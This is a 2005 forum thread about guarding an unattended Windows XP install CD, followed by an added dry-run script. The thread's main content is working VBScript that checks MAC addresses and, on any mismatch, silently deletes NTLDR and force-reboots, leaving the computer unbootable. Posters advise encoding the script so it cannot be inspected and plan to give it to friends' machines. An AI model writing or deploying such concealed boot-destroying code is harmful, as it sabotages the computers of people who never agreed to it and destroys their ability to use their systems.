Martin Zugec, posted May 31, 2005

Sorry, hard day today, still don't understand what you mean. The ntldr is first deleted, second step is restarting computer... So when computer is restarting, the ntldr is already gone...
SiMoNsAyS, posted May 31, 2005 (edited)

Let me try it again... I've modified the script to delete temp.txt on drive C: and code.vbs is the code you posted. When I run the file a message pops up where you need to press OK; before clicking, the file is still present, and if I manually reset the machine the file won't be deleted. Attached to this post is the image where you can still see temp.txt. In the same way, if you run the vbs file from runonce and you don't click it, you simply reset the machine, ntldr won't be deleted and runonce will continue from the next entry.

Edit: found another vulnerability. If you run the vbs script from cmdlines (T-13) you can open the command prompt with hotkeys, then type taskmgr.exe and from here kill wscript.exe.

Edited May 31, 2005 by SiMoNsAyS
BlueMe (Author), posted May 31, 2005

Sorry For Not Posting Anymore But I Had A Problem With My ISP... So.. Look What I've Been Thinking About... How About DEL The NTLDR Before The Windows Pops Up... I Mean If It Gets To See The Windows It Means That The Win Isn't Meant For Him... And If The MAC Is Ok.. The Script Will Continue Without Displaying Any Message... Am I Right That This Will Work?

More Simple Would Be:
Check MAC, If Ok Continue Without Displaying Nothing
If Wrong DEL NTLDR And Restart Without Prompting

Is This Possible?
TheeBeets, posted May 31, 2005

The Best Protection
Keep your hard work to yourself give to no-one
SiMoNsAyS, posted May 31, 2005

@BlueMe, that makes sense, it also won't break uA. Problem is if you want to install it on multiple PCs or if you change your MoBo. For me, protection must be something easier and available to everybody with the proper pass. For the moment TheeBeets solution is the best lol
TheeBeets, posted May 31, 2005

> @BlueMe, that makes sense, it also won't break uA. Problem is if you want to install it on multiple PCs or if you change your MoBo. For me, protection must be something easier and available to everybody with the proper pass. For the moment TheeBeets solution is the best lol

Why ThankYou my young padawan
TheeBeets reigns all
rikgale, posted May 31, 2005

Ok I have read the entire post and I have some simple (and probably dumb) questions.

1) What's the point of encoding the file using the Windows Script Encoder?
2) I assume that the cscript part of cscript //nologo restrict.vbe should be placed in system32?
3) Could the above code be placed in guirunonce in winnt.sif instead of RunOnceEx?
4) Does the MAC address of a VM change every time you reinstall the OS on it? Or does the MAC address stay until you reinstall the VM program (i.e. VMWare)?

This is a really good idea and I am very grateful to Soulin for his efforts and much respect to him as a programmer (every programmer apart from SPYWare\Virus programmers gets my respect as I can't program to save my life!)

Cheers....
dougiefresh, posted May 31, 2005

I see one MAJOR problem with this method! You see, I've been trying to come up with a way to choose the correct WPA.DBL based on the MAC address of a machine. I found that if the computer does not have the appropriate network drivers installed when my script runs, no MAC addresses are found. Therefore, I can't identify the machine via MAC addresses.

Unless you plan on (1) including Bashrat's DriverPacks and/or (2) altering your UACD for all the new hardware on the people's computers that you intend on supporting, you need to make sure all networking hardware has drivers installed before you run that script.

Other than that, I really like this solution for protecting an UACD!!!! Very, very cool!!!!!!!!!!
BlueMe (Author), posted May 31, 2005

SiMoNsAyS
That Wouldn't Be A Problem, Because I'm Not Planning To Have My UCD On Multiple PC's, Just Give It To Those 2 Friends Of Mine Which I Don't Trust Them But Then Also I Can't Refuse Them..

dougiefresh
See There That's Another Thing That I Didn't Think, And Guess What? I Was Planning On Integrate Bashrat's DriverPacks So.. It's Not So Major Now

Doesn't Anyone Know How To Modify It? I Was Thinking To Do Some Tests Tonight.
Martin Zugec, posted June 1, 2005

2Simon: Ah, I see, you are right. So the next release (today after some work I need to do first) won't show any prompt, just delete NTLDR and restart. Also successful test pass won't show any message (it was just for debugging purposes).

2rikgale:
1 - the point is people won't be able to modify it and see its content. I am using quite a lot of vbscript files, every one is encrypted and this restriction script is doing a few other things (so if someone simply removes it, it will break the UA)
2 - cscript is native in Windows (WSH), you don't need to include it in your installation
3 - Sure, but if the script is working from cmdlines.txt as Simon posted, it is better to place it there (I thought WMI classes are not available during that phase of installation, that is why I recommended ROE)
4 - Nope - the MAC address is not based on installation OR VM application, it is based on your virtually created PC. So you can manipulate with discs and installations, and MAC will be same

2dougiefresh: are you sure it is not available through WMI classes?

Modified code as I promised:

```vbscript
Option Explicit
Dim objWMIService, arrayNIC, objNIC, strMAC, strAllowedHost, arrayAllowedHosts, strYouAreWelcome
Dim strOperatingSystem, colOperatingSystems
Dim objFSO, objShell, strSystemDrive
Const wbemFlagReturnImmediately = &h10
Const wbemFlagForwardOnly = &h20
Const wmiRestartForce = 4

' MAC addresses of the machines allowed to finish the installation
arrayAllowedHosts = array("00:0b:db:87:43:be","00:0b:db:87:43:bd")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Set objWMIService = GetObject("winmgmts:\\.\root\CIMV2")
Set arrayNIC = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter", "WQL", wbemFlagReturnImmediately + wbemFlagForwardOnly)

' Compare every adapter WMI reports against the allowed list (case-insensitive)
For Each objNIC In arrayNIC
    For Each strAllowedHost in arrayAllowedHosts
        If LCase(objNIC.MACAddress) = LCase(strAllowedHost) Then strYouAreWelcome = 1
    Next
Next

' No match: delete NTLDR from the system drive and reboot, without any prompt
If strYouAreWelcome <> 1 Then
    Set colOperatingSystems = GetObject("winmgmts:{(Shutdown)}//./root/cimv2").ExecQuery("select * from Win32_OperatingSystem where Primary=true")
    strSystemDrive = objShell.ExpandEnvironmentStrings("%SystemDrive%")
    objFSO.DeleteFile strSystemDrive & "\ntldr", True
    For Each strOperatingSystem in colOperatingSystems
        strOperatingSystem.Reboot()
    Next
End If
```

4 -
BlueMe (Author), posted June 1, 2005

So It Seems I'll Just Wait For Soulin ...
Martin Zugec, posted June 1, 2005

Give up waiting, begin with testing
rikgale, posted June 1, 2005

Thanx for your answers Soulin :)
Martin Zugec, posted June 1, 2005

2BlueMe: One request, copy that script to first page of this thread please.
BrandonS_Mil, posted June 1, 2005

Just a little off topic here but..... What if you have a computer (i.e. Dell) or other system that when you load XP it doesn't know how to use your LAN.... XP says -- NOT INSTALLED.

Will the script still work???
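
On the case dougiefresh and BrandonS_Mil raise: in the script posted above, an adapter list with no MAC addresses leaves strYouAreWelcome unset exactly as a wrong MAC does, so both cases take the same branch. The following read-only dry run is an added example, not code from the thread; it reports which of the three cases a machine is in without touching any file. The NormalizeMac helper and the result strings are hypothetical names, and the allow list is the one from the posted script.

```vbscript
' Added example (not from the thread): read-only dry run of the MAC check.
' Run with: cscript //nologo <file>.vbs
Option Explicit

Const wbemFlagReturnImmediately = &h10
Const wbemFlagForwardOnly = &h20

Dim arrAllowed, objWMI, colNIC, objNIC, strMac, strAllowed
Dim intSeen, blnMatch

' The two addresses from the script posted in the thread
arrAllowed = Array("00:0b:db:87:43:be", "00:0b:db:87:43:bd")

' Hypothetical helper: accept 00-0B-DB-... as well as 00:0b:db:...
Function NormalizeMac(strValue)
    NormalizeMac = LCase(Replace(Trim(strValue), "-", ":"))
End Function

intSeen = 0
blnMatch = False

Set objWMI = GetObject("winmgmts:\\.\root\CIMV2")
Set colNIC = objWMI.ExecQuery("SELECT * FROM Win32_NetworkAdapter", "WQL", _
    wbemFlagReturnImmediately + wbemFlagForwardOnly)

For Each objNIC In colNIC
    ' MACAddress is Null for adapter entries that report no hardware address
    If Not IsNull(objNIC.MACAddress) Then
        intSeen = intSeen + 1
        strMac = NormalizeMac(objNIC.MACAddress)
        WScript.Echo "Adapter: " & objNIC.Name & "  MAC: " & strMac
        For Each strAllowed In arrAllowed
            If strMac = NormalizeMac(strAllowed) Then blnMatch = True
        Next
    End If
Next

' Three outcomes instead of two: the middle one is the missing-driver case
If blnMatch Then
    WScript.Echo "RESULT: allowed host"
ElseIf intSeen = 0 Then
    WScript.Echo "RESULT: no MAC address visible, machine cannot be identified"
Else
    WScript.Echo "RESULT: " & intSeen & " MAC address(es) seen, none on the allow list"
End If
```

Running this at the same installation stage as the real check (cmdlines.txt or RunOnceEx) shows whether WMI can see a MAC address at that point on a given machine.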